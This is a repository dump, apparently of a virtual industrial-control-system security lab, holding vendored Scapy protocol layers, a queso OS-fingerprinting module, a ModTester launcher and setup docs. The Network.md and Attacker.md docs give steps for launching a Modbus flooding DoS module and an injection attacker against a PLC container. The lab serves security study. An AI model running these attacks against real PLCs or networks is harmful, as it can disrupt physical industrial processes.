(RFC3344)" 17 | fields_desc = [ ByteEnumField("type", 1, {1:"RRQ", 3:"RRP"}) ] 18 | 19 | class MobileIPRRQ(Packet): 20 | name = "Mobile IP Registration Request (RFC3344)" 21 | fields_desc = [ XByteField("flags", 0), 22 | ShortField("lifetime", 180), 23 | IPField("homeaddr", "0.0.0.0"), 24 | IPField("haaddr", "0.0.0.0"), 25 | IPField("coaddr", "0.0.0.0"), 26 | LongField("id", 0), ] 27 | 28 | class MobileIPRRP(Packet): 29 | name = "Mobile IP Registration Reply (RFC3344)" 30 | fields_desc = [ ByteField("code", 0), 31 | ShortField("lifetime", 180), 32 | IPField("homeaddr", "0.0.0.0"), 33 | IPField("haaddr", "0.0.0.0"), 34 | LongField("id", 0), ] 35 | 36 | class MobileIPTunnelData(Packet): 37 | name = "Mobile IP Tunnel Data Message (RFC3519)" 38 | fields_desc = [ ByteField("nexthdr", 4), 39 | ShortField("res", 0) ] 40 | 41 | 42 | bind_layers( UDP, MobileIP, sport=434) 43 | bind_layers( UDP, MobileIP, dport=434) 44 | bind_layers( MobileIP, MobileIPRRQ, type=1) 45 | bind_layers( MobileIP, MobileIPRRP, type=3) 46 | bind_layers( MobileIP, MobileIPTunnelData, type=4) 47 | bind_layers( MobileIPTunnelData, IP, nexthdr=4) 48 | -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/layers/netflow.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | Cisco NetFlow protocol v1 8 | """ 9 | 10 | 11 | from scapy.fields import * 12 | from scapy.packet import * 13 | 14 | # Cisco Netflow Protocol version 1 15 | class NetflowHeader(Packet): 16 | name = "Netflow Header" 17 | fields_desc = [ ShortField("version", 1) ] 18 | 19 | class NetflowHeaderV1(Packet): 20 | name = "Netflow Header V1" 21 | fields_desc = [ ShortField("count", 0), 22 | IntField("sysUptime", 0), 23 | IntField("unixSecs", 0), 24 | IntField("unixNanoSeconds", 0) ] 25 | 26 | 27 | class NetflowRecordV1(Packet): 28 | name = "Netflow Record" 29 | fields_desc = [ IPField("ipsrc", "0.0.0.0"), 30 | IPField("ipdst", "0.0.0.0"), 31 | IPField("nexthop", "0.0.0.0"), 32 | ShortField("inputIfIndex", 0), 33 | ShortField("outpuIfIndex", 0), 34 | IntField("dpkts", 0), 35 | IntField("dbytes", 0), 36 | IntField("starttime", 0), 37 | IntField("endtime", 0), 38 | ShortField("srcport", 0), 39 | ShortField("dstport", 0), 40 | ShortField("padding", 0), 41 | ByteField("proto", 0), 42 | ByteField("tos", 0), 43 | IntField("padding1", 0), 44 | IntField("padding2", 0) ] 45 | 46 | 47 | bind_layers( NetflowHeader, NetflowHeaderV1, version=1) 48 | bind_layers( NetflowHeaderV1, NetflowRecordV1, ) 49 | -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/layers/ntp.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | NTP (Network Time Protocol). 8 | """ 9 | 10 | import time 11 | from scapy.packet import * 12 | from scapy.fields import * 13 | from scapy.layers.inet import UDP 14 | 15 | 16 | # seconds between 01-01-1900 and 01-01-1970 17 | _NTP_BASETIME = 2208988800 18 | 19 | class TimeStampField(FixedPointField): 20 | def __init__(self, name, default): 21 | FixedPointField.__init__(self, name, default, 64, 32) 22 | 23 | def i2repr(self, pkt, val): 24 | if val is None: 25 | return "--" 26 | val = self.i2h(pkt,val) 27 | if val < _NTP_BASETIME: 28 | return val 29 | return time.strftime("%a, %d %b %Y %H:%M:%S +0000", time.gmtime(val-_NTP_BASETIME)) 30 | 31 | def any2i(self, pkt, val): 32 | if type(val) is str: 33 | return int(time.mktime(time.strptime(val))) + _NTP_BASETIME + 3600 # XXX 34 | return FixedPointField.any2i(self,pkt,val) 35 | 36 | def i2m(self, pkt, val): 37 | if val is None: 38 | val = FixedPointField.any2i(self, pkt, time.time()+_NTP_BASETIME) 39 | return FixedPointField.i2m(self, pkt, val) 40 | 41 | 42 | 43 | class NTP(Packet): 44 | # RFC 1769 45 | name = "NTP" 46 | fields_desc = [ 47 | BitEnumField('leap', 0, 2, 48 | { 0: 'nowarning', 49 | 1: 'longminute', 50 | 2: 'shortminute', 51 | 3: 'notsync'}), 52 | BitField('version', 3, 3), 53 | BitEnumField('mode', 3, 3, 54 | { 0: 'reserved', 55 | 1: 'sym_active', 56 | 2: 'sym_passive', 57 | 3: 'client', 58 | 4: 'server', 59 | 5: 'broadcast', 60 | 6: 'control', 61 | 7: 'private'}), 62 | BitField('stratum', 2, 8), 63 | BitField('poll', 0xa, 8), ### XXX : it's a signed int 64 | BitField('precision', 0, 8), ### XXX : it's a signed int 65 | FixedPointField('delay', 0, size=32, frac_bits=16), 66 | FixedPointField('dispersion', 0, size=32, frac_bits=16), 67 | IPField('id', "127.0.0.1"), 68 | TimeStampField('ref', 0), 69 | TimeStampField('orig', None), # None means current time 70 | TimeStampField('recv', 0), 71 | TimeStampField('sent', None) 72 | ] 73 | def mysummary(self): 74 | return self.sprintf("NTP v%ir,NTP.version%, %NTP.mode%") 75 | 76 | 77 | bind_layers( UDP, NTP, dport=123, sport=123) 78 | -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/layers/pflog.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | PFLog: OpenBSD PF packet filter logging. 8 | """ 9 | 10 | from scapy.packet import * 11 | from scapy.fields import * 12 | from scapy.layers.inet import IP 13 | if conf.ipv6_enabled: 14 | from scapy.layers.inet6 import IPv6 15 | from scapy.config import conf 16 | 17 | class PFLog(Packet): 18 | name = "PFLog" 19 | # from OpenBSD src/sys/net/pfvar.h and src/sys/net/if_pflog.h 20 | fields_desc = [ ByteField("hdrlen", 0), 21 | ByteEnumField("addrfamily", 2, {socket.AF_INET: "IPv4", 22 | socket.AF_INET6: "IPv6"}), 23 | ByteEnumField("action", 1, {0: "pass", 1: "drop", 24 | 2: "scrub", 3: "no-scrub", 25 | 4: "nat", 5: "no-nat", 26 | 6: "binat", 7: "no-binat", 27 | 8: "rdr", 9: "no-rdr", 28 | 10: "syn-proxy-drop" }), 29 | ByteEnumField("reason", 0, {0: "match", 1: "bad-offset", 30 | 2: "fragment", 3: "short", 31 | 4: "normalize", 5: "memory", 32 | 6: "bad-timestamp", 33 | 7: "congestion", 34 | 8: "ip-options", 35 | 9: "proto-cksum", 36 | 10: "state-mismatch", 37 | 11: "state-insert", 38 | 12: "state-limit", 39 | 13: "src-limit", 40 | 14: "syn-proxy" }), 41 | StrFixedLenField("iface", "", 16), 42 | StrFixedLenField("ruleset", "", 16), 43 | SignedIntField("rulenumber", 0), 44 | SignedIntField("subrulenumber", 0), 45 | SignedIntField("uid", 0), 46 | IntField("pid", 0), 47 | SignedIntField("ruleuid", 0), 48 | IntField("rulepid", 0), 49 | ByteEnumField("direction", 255, {0: "inout", 1: "in", 50 | 2:"out", 255: "unknown"}), 51 | StrFixedLenField("pad", "\x00\x00\x00", 3 ) ] 52 | def mysummary(self): 53 | return self.sprintf("%PFLog.addrfamily% %PFLog.action% on %PFLog.iface% by rule %PFLog.rulenumber%") 54 | 55 | bind_layers(PFLog, IP, addrfamily=socket.AF_INET) 56 | if conf.ipv6_enabled: 57 | bind_layers(PFLog, IPv6, addrfamily=socket.AF_INET6) 58 | 59 | conf.l2types.register(117, PFLog) 60 | -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/layers/radius.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | RADIUS (Remote Authentication Dial In User Service) 8 | """ 9 | 10 | import struct 11 | from scapy.packet import * 12 | from scapy.fields import * 13 | 14 | class Radius(Packet): 15 | name = "Radius" 16 | fields_desc = [ ByteEnumField("code", 1, {1: "Access-Request", 17 | 2: "Access-Accept", 18 | 3: "Access-Reject", 19 | 4: "Accounting-Request", 20 | 5: "Accounting-Accept", 21 | 6: "Accounting-Status", 22 | 7: "Password-Request", 23 | 8: "Password-Ack", 24 | 9: "Password-Reject", 25 | 10: "Accounting-Message", 26 | 11: "Access-Challenge", 27 | 12: "Status-Server", 28 | 13: "Status-Client", 29 | 21: "Resource-Free-Request", 30 | 22: "Resource-Free-Response", 31 | 23: "Resource-Query-Request", 32 | 24: "Resource-Query-Response", 33 | 25: "Alternate-Resource-Reclaim-Request", 34 | 26: "NAS-Reboot-Request", 35 | 27: "NAS-Reboot-Response", 36 | 29: "Next-Passcode", 37 | 30: "New-Pin", 38 | 31: "Terminate-Session", 39 | 32: "Password-Expired", 40 | 33: "Event-Request", 41 | 34: "Event-Response", 42 | 40: "Disconnect-Request", 43 | 41: "Disconnect-ACK", 44 | 42: "Disconnect-NAK", 45 | 43: "CoA-Request", 46 | 44: "CoA-ACK", 47 | 45: "CoA-NAK", 48 | 50: "IP-Address-Allocate", 49 | 51: "IP-Address-Release", 50 | 253: "Experimental-use", 51 | 254: "Reserved", 52 | 255: "Reserved"} ), 53 | ByteField("id", 0), 54 | ShortField("len", None), 55 | StrFixedLenField("authenticator","",16) ] 56 | def post_build(self, p, pay): 57 | p += pay 58 | l = self.len 59 | if l is None: 60 | l = len(p) 61 | p = p[:2]+struct.pack("!H",l)+p[4:] 62 | return p 63 | 64 | 65 | 66 | -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/layers/rip.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | RIP (Routing Information Protocol). 8 | """ 9 | 10 | from scapy.packet import * 11 | from scapy.fields import * 12 | from scapy.layers.inet import UDP 13 | 14 | class RIP(Packet): 15 | name = "RIP header" 16 | fields_desc = [ 17 | ByteEnumField("cmd", 1, {1:"req", 2:"resp", 3:"traceOn", 4:"traceOff", 18 | 5:"sun", 6:"trigReq", 7:"trigResp", 8:"trigAck", 19 | 9:"updateReq", 10:"updateResp", 11:"updateAck"}), 20 | ByteField("version", 1), 21 | ShortField("null", 0), 22 | ] 23 | 24 | def guess_payload_class(self, payload): 25 | if payload[:2] == "\xff\xff": 26 | return RIPAuth 27 | else: 28 | return Packet.guess_payload_class(self, payload) 29 | 30 | class RIPEntry(RIP): 31 | name = "RIP entry" 32 | fields_desc = [ 33 | ShortEnumField("AF", 2, {2:"IP"}), 34 | ShortField("RouteTag", 0), 35 | IPField("addr", "0.0.0.0"), 36 | IPField("mask", "0.0.0.0"), 37 | IPField("nextHop", "0.0.0.0"), 38 | IntEnumField("metric", 1, {16:"Unreach"}), 39 | ] 40 | 41 | class RIPAuth(Packet): 42 | name = "RIP authentication" 43 | fields_desc = [ 44 | ShortEnumField("AF", 0xffff, {0xffff:"Auth"}), 45 | ShortEnumField("authtype", 2, {1:"md5authdata", 2:"simple", 3:"md5"}), 46 | ConditionalField(StrFixedLenField("password", None, 16), 47 | lambda pkt: pkt.authtype == 2), 48 | ConditionalField(ShortField("digestoffset", 0), 49 | lambda pkt: pkt.authtype == 3), 50 | ConditionalField(ByteField("keyid", 0), 51 | lambda pkt: pkt.authtype == 3), 52 | ConditionalField(ByteField("authdatalen", 0), 53 | lambda pkt: pkt.authtype == 3), 54 | ConditionalField(IntField("seqnum", 0), 55 | lambda pkt: pkt.authtype == 3), 56 | ConditionalField(StrFixedLenField("zeropad", None, 8), 57 | lambda pkt: pkt.authtype == 3), 58 | ConditionalField(StrLenField("authdata", None, 59 | length_from=lambda pkt: pkt.md5datalen), 60 | lambda pkt: pkt.authtype == 1) 61 | ] 62 | 63 | def pre_dissect(self, s): 64 | if s[2:4] == "\x00\x01": 65 | self.md5datalen = len(s) - 4 66 | 67 | return s 68 | 69 | 70 | bind_layers( UDP, RIP, sport=520) 71 | bind_layers( UDP, RIP, dport=520) 72 | bind_layers( RIP, RIPEntry, ) 73 | bind_layers( RIPEntry, RIPEntry, ) 74 | bind_layers( RIPAuth, RIPEntry, ) 75 | -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/layers/rtp.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | RTP (Real-time Transport Protocol). 8 | """ 9 | 10 | from scapy.packet import * 11 | from scapy.fields import * 12 | 13 | _rtp_payload_types = { 14 | # http://www.iana.org/assignments/rtp-parameters 15 | 0: 'G.711 PCMU', 3: 'GSM', 16 | 4: 'G723', 5: 'DVI4', 17 | 6: 'DVI4', 7: 'LPC', 18 | 8: 'PCMA', 9: 'G722', 19 | 10: 'L16', 11: 'L16', 20 | 12: 'QCELP', 13: 'CN', 21 | 14: 'MPA', 15: 'G728', 22 | 16: 'DVI4', 17: 'DVI4', 23 | 18: 'G729', 25: 'CelB', 24 | 26: 'JPEG', 28: 'nv', 25 | 31: 'H261', 32: 'MPV', 26 | 33: 'MP2T', 34: 'H263' } 27 | 28 | class RTP(Packet): 29 | name="RTP" 30 | fields_desc = [ BitField('version', 2, 2), 31 | BitField('padding', 0, 1), 32 | BitField('extension', 0, 1), 33 | BitFieldLenField('numsync', None, 4, count_of='sync'), 34 | BitField('marker', 0, 1), 35 | BitEnumField('payload', 0, 7, _rtp_payload_types), 36 | ShortField('sequence', 0), 37 | IntField('timestamp', 0), 38 | IntField('sourcesync', 0), 39 | FieldListField('sync', [], IntField("id",0), count_from=lambda pkt:pkt.numsync) ] 40 | 41 | -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/layers/vrrp.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## Copyright (C) 6WIND 5 | ## This program is published under a GPLv2 license 6 | 7 | """ 8 | VRRP (Virtual Router Redundancy Protocol). 9 | """ 10 | 11 | from scapy.packet import * 12 | from scapy.fields import * 13 | from scapy.layers.inet import IP 14 | 15 | IPPROTO_VRRP=112 16 | 17 | # RFC 3768 - Virtual Router Redundancy Protocol (VRRP) 18 | class VRRP(Packet): 19 | fields_desc = [ 20 | BitField("version" , 2, 4), 21 | BitField("type" , 1, 4), 22 | ByteField("vrid", 1), 23 | ByteField("priority", 100), 24 | FieldLenField("ipcount", None, count_of="addrlist", fmt="B"), 25 | ByteField("authtype", 0), 26 | ByteField("adv", 1), 27 | XShortField("chksum", None), 28 | FieldListField("addrlist", [], IPField("", "0.0.0.0"), 29 | count_from = lambda pkt: pkt.ipcount), 30 | IntField("auth1", 0), 31 | IntField("auth2", 0) ] 32 | 33 | def post_build(self, p, pay): 34 | if self.chksum is None: 35 | ck = checksum(p) 36 | p = p[:6]+chr(ck>>8)+chr(ck&0xff)+p[8:] 37 | return p 38 | 39 | bind_layers( IP, VRRP, proto=IPPROTO_VRRP) 40 | -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/modules/__init__.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | Package of extension modules that have to be loaded explicitly. 8 | """ 9 | -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/modules/geoip.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | GeoIP: find out the geographical location of IP addresses 8 | """ 9 | 10 | from scapy.data import KnowledgeBase 11 | from scapy.config import conf 12 | 13 | conf.IPCountry_base = "GeoIPCountry4Scapy.gz" 14 | conf.countryLoc_base = "countryLoc.csv" 15 | conf.gnuplot_world = "world.dat" 16 | 17 | 18 | ########################## 19 | ## IP location database ## 20 | ########################## 21 | 22 | class IPCountryKnowledgeBase(KnowledgeBase): 23 | """ 24 | How to generate the base : 25 | db = [] 26 | for l in open("GeoIPCountryWhois.csv").readlines(): 27 | s,e,c = l.split(",")[2:5] 28 | db.append((int(s[1:-1]),int(e[1:-1]),c[1:-1])) 29 | cPickle.dump(gzip.open("xxx","w"),db) 30 | """ 31 | def lazy_init(self): 32 | self.base = load_object(self.filename) 33 | 34 | 35 | class CountryLocKnowledgeBase(KnowledgeBase): 36 | def lazy_init(self): 37 | f=open(self.filename) 38 | self.base = {} 39 | while 1: 40 | l = f.readline() 41 | if not l: 42 | break 43 | l = l.strip().split(",") 44 | if len(l) != 3: 45 | continue 46 | c,lat,long = l 47 | 48 | self.base[c] = (float(long),float(lat)) 49 | f.close() 50 | 51 | 52 | 53 | @conf.commands.register 54 | def locate_ip(ip): 55 | """Get geographic coordinates from IP using geoip database""" 56 | ip=map(int,ip.split(".")) 57 | ip = ip[3]+(ip[2]<<8L)+(ip[1]<<16L)+(ip[0]<<24L) 58 | 59 | cloc = country_loc_kdb.get_base() 60 | db = IP_country_kdb.get_base() 61 | 62 | d=0 63 | f=len(db)-1 64 | while (f-d) > 1: 65 | guess = (d+f)/2 66 | if ip > db[guess][0]: 67 | d = guess 68 | else: 69 | f = guess 70 | s,e,c = db[guess] 71 | if s <= ip and ip <= e: 72 | return cloc.get(c,None) 73 | 74 | 75 | 76 | 77 | 78 | conf.IP_country_kdb = IPCountryKnowledgeBase(conf.IPCountry_base) 79 | conf.country_loc_kdb = CountryLocKnowledgeBase(conf.countryLoc_base) 80 | -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/modules/queso.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | Clone of queso OS fingerprinting 8 | """ 9 | 10 | from scapy.data import KnowledgeBase 11 | from scapy.config import conf 12 | from scapy.layers.inet import IP,TCP 13 | #from 14 | 15 | conf.queso_base ="/etc/queso.conf" 16 | 17 | 18 | ################# 19 | ## Queso stuff ## 20 | ################# 21 | 22 | 23 | def quesoTCPflags(flags): 24 | if flags == "-": 25 | return "-" 26 | flv = "FSRPAUXY" 27 | v = 0 28 | for i in flags: 29 | v |= 2**flv.index(i) 30 | return "%x" % v 31 | 32 | class QuesoKnowledgeBase(KnowledgeBase): 33 | def lazy_init(self): 34 | try: 35 | f = open(self.filename) 36 | except IOError: 37 | return 38 | self.base = {} 39 | p = None 40 | try: 41 | for l in f: 42 | l = l.strip() 43 | if not l or l[0] == ';': 44 | continue 45 | if l[0] == '*': 46 | if p is not None: 47 | p[""] = name 48 | name = l[1:].strip() 49 | p = self.base 50 | continue 51 | if l[0] not in list("0123456"): 52 | continue 53 | res = l[2:].split() 54 | res[-1] = quesoTCPflags(res[-1]) 55 | res = " ".join(res) 56 | if not p.has_key(res): 57 | p[res] = {} 58 | p = p[res] 59 | if p is not None: 60 | p[""] = name 61 | except: 62 | self.base = None 63 | warning("Can't load queso base [%s]", self.filename) 64 | f.close() 65 | 66 | 67 | queso_kdb = QuesoKnowledgeBase(conf.queso_base) 68 | 69 | 70 | def queso_sig(target, dport=80, timeout=3): 71 | p = queso_kdb.get_base() 72 | ret = [] 73 | for flags in ["S", "SA", "F", "FA", "SF", "P", "SEC"]: 74 | ans, unans = sr(IP(dst=target)/TCP(dport=dport,flags=flags,seq=RandInt()), 75 | timeout=timeout, verbose=0) 76 | if len(ans) == 0: 77 | rs = "- - - -" 78 | else: 79 | s,r = ans[0] 80 | rs = "%i" % (r.seq != 0) 81 | if not r.ack: 82 | r += " 0" 83 | elif r.ack-s.seq > 666: 84 | rs += " R" % 0 85 | else: 86 | rs += " +%i" % (r.ack-s.seq) 87 | rs += " %X" % r.window 88 | rs += " %x" % r.payload.flags 89 | ret.append(rs) 90 | return ret 91 | 92 | def queso_search(sig): 93 | p = queso_kdb.get_base() 94 | sig.reverse() 95 | ret = [] 96 | try: 97 | while sig: 98 | s = sig.pop() 99 | p = p[s] 100 | if p.has_key(""): 101 | ret.append(p[""]) 102 | except KeyError: 103 | pass 104 | return ret 105 | 106 | 107 | @conf.commands.register 108 | def queso(*args,**kargs): 109 | """Queso OS fingerprinting 110 | queso(target, dport=80, timeout=3)""" 111 | return queso_search(queso_sig(*args, **kargs)) 112 | 113 | 114 | -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/tools/__init__.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | Additional tools to be run separately 8 | """ 9 | -------------------------------------------------------------------------------- /attacker/modtester/System/Lib/scapy/tools/check_asdis.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | import getopt 4 | 5 | def usage(): 6 | print >>sys.stderr,"""Usage: check_asdis -i [-o ] 7 | -v increase verbosity 8 | -d hexdiff packets that differ 9 | -z compress output pcap 10 | -a open pcap file in append mode""" 11 | 12 | def main(argv): 13 | PCAP_IN = None 14 | PCAP_OUT = None 15 | COMPRESS=False 16 | APPEND=False 17 | DIFF=False 18 | VERBOSE=0 19 | try: 20 | opts=getopt.getopt(argv, "hi:o:azdv") 21 | for opt, parm in opts[0]: 22 | if opt == "-h": 23 | usage() 24 | raise SystemExit 25 | elif opt == "-i": 26 | PCAP_IN = parm 27 | elif opt == "-o": 28 | PCAP_OUT = parm 29 | elif opt == "-v": 30 | VERBOSE += 1 31 | elif opt == "-d": 32 | DIFF = True 33 | elif opt == "-a": 34 | APPEND = True 35 | elif opt == "-z": 36 | COMPRESS = True 37 | 38 | 39 | if PCAP_IN is None: 40 | raise getopt.GetoptError("Missing pcap file (-i)") 41 | 42 | except getopt.GetoptError,e: 43 | print >>sys.stderr,"ERROR: %s" % e 44 | raise SystemExit 45 | 46 | 47 | 48 | from scapy.config import conf 49 | from scapy.utils import RawPcapReader,RawPcapWriter,hexdiff 50 | from scapy.layers import all 51 | 52 | 53 | pcap = RawPcapReader(PCAP_IN) 54 | pcap_out = None 55 | if PCAP_OUT: 56 | pcap_out = RawPcapWriter(PCAP_OUT, append=APPEND, gz=COMPRESS, linktype=pcap.linktype) 57 | pcap_out._write_header(None) 58 | 59 | LLcls = conf.l2types.get(pcap.linktype) 60 | if LLcls is None: 61 | print >>sys.stderr," Unknown link type [%i]. Can't test anything!" % pcap.linktype 62 | raise SystemExit 63 | 64 | 65 | i=-1 66 | differ=0 67 | failed=0 68 | for p1,meta in pcap: 69 | i += 1 70 | try: 71 | p2d = LLcls(p1) 72 | p2 = str(p2d) 73 | except KeyboardInterrupt: 74 | raise 75 | except Exception,e: 76 | print "Dissection error on packet %i" % i 77 | failed += 1 78 | else: 79 | if p1 == p2: 80 | if VERBOSE >= 2: 81 | print "Packet %i ok" % i 82 | continue 83 | else: 84 | print "Packet %i differs" % i 85 | differ += 1 86 | if VERBOSE >= 1: 87 | print repr(p2d) 88 | if DIFF: 89 | hexdiff(p1,p2) 90 | if pcap_out is not None: 91 | pcap_out.write(p1) 92 | i+=1 93 | correct = i-differ-failed 94 | print "%i total packets. %i ok, %i differed, %i failed. %.2f%% correct." % (i, correct, differ, 95 | failed, i and 100.0*(correct)/i) 96 | 97 | 98 | if __name__ == "__main__": 99 | import sys 100 | try: 101 | main(sys.argv[1:]) 102 | except KeyboardInterrupt: 103 | print >>sys.stderr,"Interrupted by user." 104 | -------------------------------------------------------------------------------- /attacker/modtester/System/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/attacker/modtester/System/__init__.py -------------------------------------------------------------------------------- /attacker/modtester/documentacion ModTester.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/attacker/modtester/documentacion ModTester.pdf -------------------------------------------------------------------------------- /attacker/modtester/modTester.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import os 3 | 4 | sys.path.append(os.path.abspath(os.path.dirname(__file__) + '/System')) 5 | from System.Core import Interface 6 | 7 | Interface.init() 8 | Interface.mainLoop() 9 | -------------------------------------------------------------------------------- /attacker/single_attacker/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu 2 | # ... 3 | ENV DEBIAN_FRONTEND noninteractive 4 | RUN apt-get update && \ 5 | apt-get -y install gcc g++ mono-mcs && \ 6 | rm -rf /var/lib/apt/lists/* 7 | RUN mkdir attacker 8 | COPY injection_attack /attacker 9 | -------------------------------------------------------------------------------- /attacker/single_attacker/injection_attack: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sfl0r3nz05/ICSsVirtualForCiberSec/484288ffe8636da3233874deef8f951b89453fdb/attacker/single_attacker/injection_attack -------------------------------------------------------------------------------- /documentation/Components/Attacker.md: -------------------------------------------------------------------------------- 1 | # Build and Set-Up Attacker container 2 | 3 | - **Attacker** is divided into: *Single Attacker* and *Modtester* tool. 4 | 5 | ## Single Attacker 6 | 7 | ### Create your own Attacker Docker image 8 | 9 | - Go to attacker folder `cd ~/ICSVirtual/attacker`. 10 | - Compile `injection_attack.cpp` file `g++ injection_attack.cpp -o injection_attack -pthread`. 11 | - Build image: `docker build -t attacker .`. 12 | 13 | ### Use the attacker image created for the project 14 | 15 | - Open docker-compose file `cd ~/ICSVirtual/network/attacker`. 16 | - Change the image of the `matlab` service by `sflorenz05/attacker:v0.1`. 17 | 18 | ### Deploying Attacker 19 | 20 | - Compile attacker code: 21 | - `cd ~/ICSVirtual/attacker` 22 | - `g++ injection_attack.cpp -o injection_attack -pthread` 23 | - Add permissions: 24 | - `cd ~/ICSVirtual/network/attacker` 25 | - `sudo chmod +x scripts/*.*` 26 | - Set enviromental variables: 27 | - Copy the `.env.example` and paste in the same path. 28 | - Rename `.env.example` to `.env`. 29 | - Inspect the PLC container: `docker inspect ` to recover IP address of this container. 30 | - Set the `IP_PLC` variable. 31 | - Set the `FREQ` variable. 32 | 33 | ## ModTester 34 | 35 | ### Create your own ModTester Docker image 36 | 37 | - Go to modtester folder `cd ~/ICSVirtual/modtester`. 38 | - Build image: `docker build -t modtester .`. 39 | 40 | ### Use the ModTester image created for the project 41 | 42 | - Open docker-compose file `cd ~/ICSVirtual/network/modtester`. 43 | - Change the image of the `matlab` service by `sflorenz05/modtester:v0.2`. 44 | 45 | ### Deploying ModTester 46 | 47 | - Add permissions: 48 | - `cd ~/ICSVirtual/network/modtester` 49 | - `sudo chmod +x scripts/*.*` 50 | -------------------------------------------------------------------------------- /documentation/Components/Network.md: -------------------------------------------------------------------------------- 1 | # Build and Set-Up the network to be deployed 2 | 3 | ## For deployment based on `docker compose` 4 | 5 | ### Deploy the ICS Network 6 | 7 | - Add permissions 8 | - `cd ~/ICSVirtual/network/ICSNetwork` 9 | - `sudo chmod +x scripts/*.*` 10 | 11 | - Deploy ICSNetwork 12 | 13 | - `cd ~/ICSVirtual/network/ICSNetwork` 14 | 15 | - `make start` 16 | 17 | - `make stop` 18 | 19 | - `make destroy` 20 | 21 | ### Deploy Attacker 22 | 23 | - Single Attacker 24 | 25 | - `cd ~/ICSVirtual/network/attacker` 26 | 27 | - `make start` 28 | 29 | - `make stop` 30 | 31 | - `make destroy` 32 | 33 | - ModTester 34 | 35 | - `cd ~/ICSVirtual/network/modtester` 36 | 37 | - `make start` 38 | 39 | - `docker exec -it bash` 40 | - E.g.: `docker exec -it 91d48b6bdabd bash` 41 | 42 | - Inside the container execute: 43 | 44 | - `python modTester.py` 45 | 46 | - `show modules` / `use module_name` 47 | - E.g.: `use modbus/dos/floodingAttack` 48 | 49 | - `show options` to see options to complete. 50 | - E.g.: `set RHOSTS ip` --> `set RHOSTS 172.18.0.2` 51 | - E.g.: `set sIP ip` --> `set sIP 172.18.0.3` 52 | 53 | - `exploit` 54 | 55 | - `make stop` 56 | 57 | - `make destroy` 58 | 59 | ### Collect Network Traffic using TCPDump Tool 60 | 61 | - To capture the traffic into the ICSNetwork the [TCPDump](https://www.tcpdump.org/) tool is used. 62 | - To deploy as part of the Docker Infrastructure `kaazing/tcpdump` image is [used](https://hub.docker.com/r/kaazing/tcpdump). 63 | - Once the `tcpdump` container is deployed an `*.pcap` file is included as part of the `tcpdump` folder. 64 | 65 | ![tcpdump1](https://user-images.githubusercontent.com/6643905/213816622-83873059-d039-4d0b-a226-e9593bc82cdf.png) 66 | 67 | - Once `*.pcap` file is downloaded, it can be opened using Wireshark. 68 | 69 | ![tcpdump2](https://user-images.githubusercontent.com/6643905/213816617-e5c4e39c-1cc9-45e2-b303-fa1724036658.png) 70 | 71 | - How to Deploy tcpdump 72 | 73 | - `cd ~/ICSVirtual/network/tcpdump` 74 | 75 | - `make start` 76 | 77 | - `make stop` 78 | 79 | - `make destroy` 80 | 81 | ## For deployment based on `GNS3` 82 | -------------------------------------------------------------------------------- /documentation/Components/OpenPLC.md: -------------------------------------------------------------------------------- 1 | # Build and Set-Up OpenPLC container 2 